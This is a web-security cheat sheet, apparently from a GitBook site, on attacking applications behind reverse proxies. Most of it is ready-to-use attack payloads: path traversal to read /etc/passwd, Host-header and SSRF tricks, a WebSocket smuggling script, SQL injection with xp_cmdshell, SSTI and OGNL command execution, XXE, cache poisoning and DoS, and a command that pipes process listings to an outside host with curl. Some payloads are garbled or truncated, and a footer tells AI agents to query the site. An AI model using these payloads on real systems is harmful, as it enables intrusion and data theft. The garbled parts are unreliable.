# Attacking Secondary Context ### Secondary Context in Web Applications **Secondary context** refers to the different ways a web application can handle and process requests indirectly related to the main content. This often involves proxies, back-end servers, and intermediate services that might introduce additional security risks. ### Identify Some " Hidden " Reverse HTTP Proxies {% embed url="" %} The heuristic rules used are the following : * A `502` status code is returned (RFC 2616, section 14.31) * A `483` status code is returned (RFC 3261, section 8.1.1.6) * When using TRACE, the body contains the '`X-Forwarded-For`' string * '`Via`' or '`X-Via`' headers are detected * Some fields are different between hops : * HTTP status codes * '`Server`' headers * '`Content`-Type' headers * '`Via`' headers * HTML titles * HTML '`address`' tags * '`X-Forwarded-For`' values in body * Using [HTTP-Traceroute.py](https://www.agarri.fr/docs/HTTP-Traceroute.py) tool. ### Identify Routing Of HTTP Request * Does `/Endpoint-To-Proxy/../` Return **Something** Different Than `/` * Does `/Endpoint-To-Proxy/../` Return **Headers** Different Than `/` * Try To Inject **Encode , Double** OR **Triple URL Encoding** In Parameters e.g. `https://www.company.com/api/path?id=%23` | . | %2e | | - | --- | | # | %23 | | ? | %3F | | & | %26 | | / | %2F | | @ | %40 | * Try To Inject Encode , Double OR Triple URL Encoding These Payloads After URL * `..%2f%23` * `..;/` * `..%00/` * `..%0d/` * `..%5c` * `..\` * `..%ff/` * `%2e%2e%2f` * `.%2e/` e.g. `https://www.company.com/api/..%00/` ### Using OPTIONS Method for endpoint discovery * Using `OPTIONS` Method to identify other endpoints {% embed url="" %} ### Check PUT Method * Try To **Change Request Method** To `PUT` If You Got `201 Created` Then There Is `RCE` ```http PUT /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com // references https://www.hackingarticles.in/multiple-ways-to-exploiting-put-method/ https://www.arridae.com/blogs/HTTP-PUT-method.php https://asfiyashaikh.medium.com/exploiting-put-method-d2d0cd7ba662 ``` * Try To Append `.json` Extension To Your Endpoints `e.g. /endpoint-To-Proxy.json` To Get Sensitive Information -> [Tweet](https://x.com/intigriti/status/1177178910397796353) {% embed url="" fullWidth="false" %} ### Smuggling via HTTP/2 Cleartext * Try To Figure Out Are There Endpoints Accept Establishing HTTP/2 Cleartext , If Yes Try To Smuggler It By Using Tool e.g. [h2csmuggler](https://github.com/BishopFox/h2csmuggler) {% embed url="" %} ```bash Steps to produce :- 1 - Collect All The Endpoints 2 - Put It In File Called e.g. url.txt 3 - Open Your Terminal 4 - Write This Command python3 h2csmuggler.py --scan-list url.txt --threads 5 ``` ### Smuggling WebSockets * Smuggler Websocket Endpoints {% embed url="" %} {% embed url="" %} ```python import socket req1 = '''GET /ُEndpoint-To-Proxy/ HTTP/1.1 Host: company.com Sec-WebSocket-Version: 1337 Upgrade: websocket '''.replace('\n', '\r\n') req2 = '''GET /Internal-Endpoint HTTP/1.1 Host: localhost:PORT '''.replace('\n', '\r\n') def main(netloc): host, port = netloc.split(':') sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, int(port))) sock.sendall(req1) sock.recv(4096) sock.sendall(req2) data = sock.recv(4096) data = data.decode(errors='ignore') print data sock.shutdown(socket.SHUT_RDWR) sock.close() ----------------------------------------------------------------------------- Steps to produce :- 1 - Open Your Terminal 2 - Write This Command python3 websocket-smuggler.py ``` ### XSS * **XSS in Referrer** ```http Referer: "> ``` {% embed url="" %} * If There Is **Nginx As Reverse Proxy** Try To Inject **Blind XSS Payloads** {% embed url="" %} ```http GET /Endpoint-To-Proxy/%3D%22img src='https://RandomString(10).id.burpcollaborator.net'%22%3E HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com Connection: keep-alive ``` * Try To Inject XSS Payloads After Your Endpoints ```http GET /Endpoint-To-Proxy/ "> HTTP/1.1 Host: company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com Connection: keep-alive --------------------- // resources https://medium.com/@saamux/reflected-xss-on-www-yahoo-com-9b1857cecb8c https://medium.com/bugbountywriteup/900-xss-in-yahoo-recon-wins-65ee6d4bfcbd https://medium.com/@saamux/filter-bypass-to-reflected-xss-on-https-finance-yahoo-com-mobile-version-22b854327b27 ``` ### Host Header Injection {% embed url="" %} ```http GET /Endpoint-To-Proxy HTTP/1.1 Host: RandomString(10).id.burpcollaborator.net User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com Connection: keep-alive ----------------------------------------------------------- // Ambiguate The Host Header Host: company.com@RandomString(10).id.burpcollaborator.net Host: company.com:@RandomString(10).id.burpcollaborator.net Host: company.com:RandomString(10).id.burpcollaborator.net Host: RandomString(10).id.burpcollaborator.net Host: localhost Host: company.com:PORT ---------------- Host: RandomString(10).id.burpcollaborator.net X-Forwarded-Host: RandomString(10).id.burpcollaborator.net --------------------- //Space-surrounded Host Header Host: www.company.com Host: RandomString(10).id.burpcollaborator.net ------------------------- //Change Host Header To host Header host: comapny.com ------------------------ // o Remove The Space That In The Host Header Host:www.company.com ---------------- // Add Tab Instead Of The Space That In The Host Header Host: www.company.com ---------------------------- Add / , : , \x00 , \x20 , \x09 , \xad After Value Of The Host Header Host: www.company.com sensitive-file.txt ---------------------------------------- // Override The Host Header e.g. POST https://company.com // AND Change Host Header e.g Host: RandomString(10).id.burpcollaborator.net // To Get SSRF GET https://company.com/Endpoint-To-Proxy HTTP/1.1 Host: RandomString(10).id.burpcollaborator.net -------------------------------------- // Spoof The Original IP GET /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com X-Forwarded-For: 0000::1 Source: https://hackerone.com/reports/44513 ------------------------------- GET /Endpoint-To-Proxy HTTP/1.0 Host: www.company.com X-Forwarded-For: RandomString(10).id.burpcollaborator.net Source: https://twitter.com/ADITYASHENDE17/status/1305723250413105152 ---------------------------------------------------- GET /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com X-Forwarded-For: 0177.1 Source: https://twitter.com/agarri_fr/status/965196958011920384 ----------------------------------------------------- // Other Bypasses X-Forwarded-For: 127.0.0.1\r X_Forwarded_For: 127.0.0.1 Forwarded: for=127.0.0.1 X-ProxyUser-Ip: 127.0.0.1 X-Remote-User: admin Referer: RandomString(10).id.burpcollaborator.net Origin: https://RandomString(10).id.burpcollaborator.net ---------- Referer: RandomString(10).id.burpcollaborator.net Referer: RandomString(10).id.burpcollaborator.net Origin: https://RandomString(10).id.burpcollaborator.net Origin: https://RandomString(10).id.burpcollaborator.net -------------------------------------- # Inject Noun-Standard Headers X-Forwarded-For: RandomString(10).id.burpcollaborator.net X-Forwarded-Host: RandomString(10).id.burpcollaborator.net X-Client-IP: RandomString(10).id.burpcollaborator.net X-Originating-IP: RandomString(10).id.burpcollaborator.net X-WAP-Profile: https://RandomString(10).id.burpcollaborator.net True-Client-IP: RandomString(10).id.burpcollaborator.net ---------------------------------------------------------------------------- # Double Noun-Standard Headers X-Forwarded-For: RandomString(10).id.burpcollaborator.net X-Forwarded-For: RandomString(10).id.burpcollaborator.net X-Forwarded-Host: RandomString(10).id.burpcollaborator.net X-Forwarded-Host: RandomString(10).id.burpcollaborator.net X-Client-IP: RandomString(10).id.burpcollaborator.net X-Client-IP: RandomString(10).id.burpcollaborator.net -------------------------------------------------- # Sources https://zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf https://blog.paloaltonetworks.com/2019/10/cloud-kubernetes-vulnerabilities/ https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For https://speakerdeck.com/bo0om/at-home-among-strangers?slide=8 https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Forwarded https://www.slideshare.net/sergeybelove/attacking-thru-http-host-header https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypass https://www.youtube.com/watch?v=zP4b3pw94s0 https://hackerone.com/reports/429617 https://medium.com/bugbountywriteup/identifying-escalating-http-host-header-injection-attacks-7586d0ff2c67 https://www.youtube.com/watch?v=zP4b3pw94s0 https://www.youtube.com/watch?v=V8f6gqrCbZU https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet ``` * Try To Change Routing Of The Request To Get SSRF {% embed url="" %} ```http GET /Endpoint-To-Proxy@RandomString(10).id.burpcollaborator.net# HTTP/1.1 Host: company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com Connection: keep-alive ------------------------------------------------- GET @RandomString(10).id.burpcollaborator.net/Endpoint-To-Proxy HTTP/1.1 GET :@RandomString(10).id.burpcollaborator.net/Endpoint-To-Proxy HTTP/1.1 GET /Endpoint-To-Proxy:@RandomString(5).id.burpcollaborator.net# HTTP/1.0 GET /Endpoint-To-Proxy@RandomString(5).id.burpcollaborator.net# HTTP/1.0 ---------------------------------------------- // resources https://www.youtube.com/watch?v=zP4b3pw94s0 https://www.youtube.com/watch?v=gluSEBZpplQ https://www.contextis.com/us/blog/server-technologies-reverse-proxy-bypass ``` ### Blind XSS or Time-Based SQLi in X-Forwarded-For header ```html "> ";WAITFOR DELAY '0.0.20'-- ``` {% embed url="" %} {% embed url="" %} ### Blind XSS or QLI in User Agent ``` "> 'XOR(if(now()=sysdate(),sleep(30),0))OR' User-Agent: Mozilla/5.0'XOR(if(now()=sysdate(),sleep(30),0))OR' ``` {% embed url="" %} {% embed url="" %} ### RCE in User Agent ```http User-Agent: { :;}; echo $(https://www.youtube.com/watch?v=bDxYWGxuVqE ------------------------------------------------ GET /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 X-Forwarded-Scheme: nothttps X-Forwarded-Host: RandomString(10).id.burpcollaborator.net -> https://www.youtube.com/watch?v=j2RrmNxJZ5c -------------------------------------------------------- GET /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 X-Host: RandomString(10).id.burpcollaborator.net -------------------------------------------------- X-Host: RandomString(10).id.burpcollaborator.net ------------------ X-Oversized-Header-1: xxxxx 20K xxxx X-Oversized-Header-2: xxxxx 20K xxxx --------------------------- X-Metachar-Header: \n -> https://cpdos.org/ -------------------------------------------------- X-HTTP-Method-Override: PUT - https://blog.appsecco.com/aws-ec2-imdsv2-versus-an-esoteric-http-method-8bc1b9616ae8 - https://cpdos.org/ ---------------------- X-Forwarded-Port: 123 - https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning - https://hackerone.com/reports/409370 ---------------------------------- X-Forwarded-SSL: off - https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning --------------------- Max-Forwards: 0 ------------------------------ zTransfer-Encoding: xxxx -------------- Accept_Encoding: xxxx ------------------- Range: bytes=cow ----------------------- User-Agent: xxxx 20K xxxx ------------------------ Try To Inject Keep-Alive , Transfer-Encoding , Trailer , Upgrade , Proxy-Authorization , TE Connection OR Proxy-Authenticate e.g. Connection: close, Cookie To Abuse Hop-By-Hop Connection: close, Cookie - https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers ----------------------------- Try To Inject ?%xx , %xx OR %xxx 20k xxx e.g. Endpoint-To-Proxy/%xx To Do DOS Attack GET /Endpoint-To-Proxy/%xxx 20k xxx HTTP/1.1 Host: company.com User-Agent: Mozilla/5.0 - https://hackerone.com/reports/500686 ---------------------------- Try To Add Parameter With Value e.g. ?parameter=cache OR If There Is Parameters Try To Add Another e.g. lang=en¶meter=cache To Achieve Cache Poisoning GET /Endpoint-To-Proxy?parameter=cache HTTP/1.1 Host: company.com User-Agent: Mozilla/5.0 - https://www.youtube.com/watch?v=bDxYWGxuVqE ------------------------------------------------ Add Parameter With Large Value e.g. ?parameter=xxx 20K xxx GET /Endpoint-To-Proxy?parameter=xxxx 20K xxxx HTTP/1.1 Host: company.com User-Agent: Mozilla/5.0 - https://www.youtube.com/watch?v=bDxYWGxuVqE ---------- GET /Endpoint-To-Proxy?_parameter=cache HTTP/1.1 Host: company.com User-Agent: Mozilla/5.0 - https://www.youtube.com/watch?v=bDxYWGxuVqE ;parameter=cache -------------------------------------- GET /Endpoint-To-Proxy HTTP/1.1 Host: company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com Connection: keep-alive parameter=cache _parameter=cache ``` * * * ### LFI If There Is Nginx As Reverse Proxy AND Weblogic As Backend Try To Use /#/../ To Change Route Of Endpoints ```http GET /Endpoint-To-Proxy/#/../../../../../../../../../../etc/passwd HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Origin: https://www.company.com --------------------------------------- GET /../../../../../../../etc/passwd;/../Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 --------------------------------------- GET /Endpoint-To-Proxy../../../../../../../etc/passwd HTTP/1.1 Host: www.company.com -------------------------------------------- GET /Endpoint-To-Proxy/..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ------------------------------------------ Try To Inject \..\.\..\.\..\.\..\.\..\.\..\.\Internal-Endpoint OR \..\..\..\.\..\..\Internal-Endpoint\..\..\..\..\..\etc\passwd%3F.js GET /Endpoint-To-Proxy\..\.\..\.\..\.\..\.\Internal-Endpoint HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 --------------------------------------------- Let’s Assume There Is Routing To Pulse Secure SSL VPN So , Try To Inject To Get File etc/hosts GET /Endpoint-To-Proxy/dana-na/../dana/html5acc/guacamole/../ ../../../../../etc/hosts?/dana/html5acc/guacamole/# HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ---------------------------------------------------- s Apache As Reverse Proxy Try To Use /..// To Change Route Of Endpoints GET /Endpoint-To-Proxy/..//../../../../../../etc/passwd HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 -------------------------------------------------- If There Is Apache As Reverse Proxy Try To Use %3F To Bypass Blacklist Of Endpoints GET /Endpoint-To-Proxy/.git%3FAllowed HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ------------------------------------------------ If There Is Nginx As Reverse Proxy AND Apache As Backend Try To Use //../ To Change Route Of Endpoints GET /Endpoint-To-Proxy/../../../../../../../etc/passwd//../ HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ------------------------------------------------------- If There Is Nginx As Reverse Proxy Try To Use ..;/ To Bypass Blacklist Of Endpoints OR Bypass CORS GET /Endpoint-To-Proxy/..;/../../../../../../etc/passwd HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 --------------------------------------- GET /../../../../etc/passwd/..;/Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ---------------------------------------- GeT /Endpoint-To-Proxy/../../../../../../etc/passwd HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ------------------------------------------ # If There Is Varnish As Reverse Proxy GeT /Endpoint-To-Proxy/../../../../../../etc/passwd HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ------------------------------------------ # If There Is Haproxy OR Varnish As Reverse Proxy GET http://company.com/Endpoints-To-Proxy/.git HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ------------------------------------- ``` * * * * * * * * * * * * ### RCE * Try To Change Method To POST And Add Body e.g. To Get RCE ```http POST /Endpoint-To-Proxy HTTP/1.1 Host: company.com User-Agent: Mozilla/5.0 Referer: https://previous.com/path Content-Type":"application/x-www-form-urlencoded Origin: https://www.company.com Connection: keep-alive ``` {% embed url="" %} * **RCE in Content-Type Header** ```http Content-Type: %{#context['com.opensymphony.xwork2 .dispatcher.HttpServletResponse'].addHeader(Header,4*4)}.multip art/form-data ``` * * * * ### SSTI {% embed url="" %} {% embed url="" %} ```http GET /Endpoint-To-Proxy/(${T(java.lang.Runtime). getRuntime().exec('nslookup id.burpcollaborator.net')}) HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ``` ### SQLi ```http GET /Endpoint-To-Proxy/ 'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ``` ```http GET /Endpoint-To-Proxy/ 'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 ``` {% embed url="" %} ### CRLF ```http POST /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Origin: https://www.company.com Content-Type: application/json Content-Length: Number { "parameter":"value%0A%01%09Host:%20id.burpcollaborator.net" } ``` {% embed url="" %} ### Paameter Manipulation * Assume Backend Endpoint Take Value Of One Parameter As Path So Inject Encode , Double OR Triple URL Encoding ;@me.com , @me.com OR :@me.com To Get SSRF ```http POST /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Origin: https://www.company.com Content-Type: application/json Content-Length: Number { "parameter":";@RandomString(10).id.burpcollaborator.net" } ``` {% embed url="" %} * Assume Backend Endpoint Take Value Of One Parameter As Rewrite Configuration e.g. `rewrite ^.*$ $arg_parameter;` So Inject e.g. LFI Payloads To Get e.g. `LFI` ```http POST /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Origin: https://www.company.com Content-Type: application/json Content-Length: Number { "parameter":"../../../../../../../../../../../../etc/passwd" } ``` {% embed url="" %} * **RCE** ```http POST /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Origin: https://www.company.com Content-Type: application/json Content-Length: Number {"parameter":"${nslookup id.burpcollaborator.net}"} ``` {% embed url="" %} ```http POST /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Origin: https://www.company.com Content-Type: application/json Content-Length: Number { "parameter":"&nslookup me.com&'\"`0&nslookup me.com&`'" } ``` {% embed url="" %} * * ```http POST /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Origin: https://www.company.com Content-Type: application/json Content-Length: Number { "parameter":"0 -write |ps${IFS}aux|curl${IFS}http://me.com${IFS}-d${IFS}@-" } ``` {% embed url="" %} * **SQL Injection** ```http POST /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com User-Agent: Mozilla/5.0 Origin: https://www.company.com Content-Type: application/json Content-Length: Number {"parameter":"; DECLARE @command varchar(255); SELECT @command='ping id.burpcollaborator.net'; EXEC Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP'"} ``` {% embed url="" %} * **Blind XSS** ```http POST /Endpoint-To-Proxy HTTP/1.1 Host: www.company.com Content-Type: application/json Content-Length: Number { "parameter":"" } ``` * ### XXE * If Body Of Request JSON Data , Try To Convert It XML With XXE Payloads ```http POST /Endpoint-To-Proxy/ HTTP/1.1 Host: www.company.com Content-Type: application/xml Content-Length: Number ]> * * ```http POST /Endpoint-To-Proxy/ HTTP/1.1 Host: www.company.com Content-Type: application/xml Content-Length: Number %remote; ]> &xxe; a ``` * ## RealWorld Examples
{% embed url="" %} ### References * * * * * [Secondary-Contexts.pdf](https://prod-files-secure.s3.us-west-2.amazonaws.com/20824215-2216-4e41-a444-2e6158426b5c/1eccb217-8160-472f-86e9-8c05cac6419a/Secondary-Contexts.pdf) * * * * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sallam.gitbook.io/sec-88/web-appsec/attacking-secondary-context.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.